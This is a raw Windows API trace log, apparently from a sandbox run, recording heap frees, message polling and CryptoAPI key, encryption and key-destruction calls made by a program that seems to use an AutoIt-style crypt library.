HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0178.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.900] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0178.901] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.902] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.902] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0178.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.903] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.903] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.903] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.903] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.904] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x108d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x1090) returned 1 [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.904] CharLowerBuffW (in: lpsz="byte[4241]", cchLength=0xa | out: lpsz="byte[4241]") returned 0xa [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.904] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.904] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x903678*, pdwDataLen=0x87e820*=0x108d, dwBufLen=0x1090 | out: pbData=0x903678*, pdwDataLen=0x87e820*=0x1090) returned 1 [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.905] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.905] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.909] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.909] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.909] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.910] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.910] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.910] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.910] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.912] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.912] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.913] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0178.913] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.913] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.913] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0178.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.913] CryptDestroyKey (hKey=0x90af18) returned 1 [0178.913] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.913] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.913] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.913] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.913] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.913] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.913] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.914] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.914] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.914] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.914] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 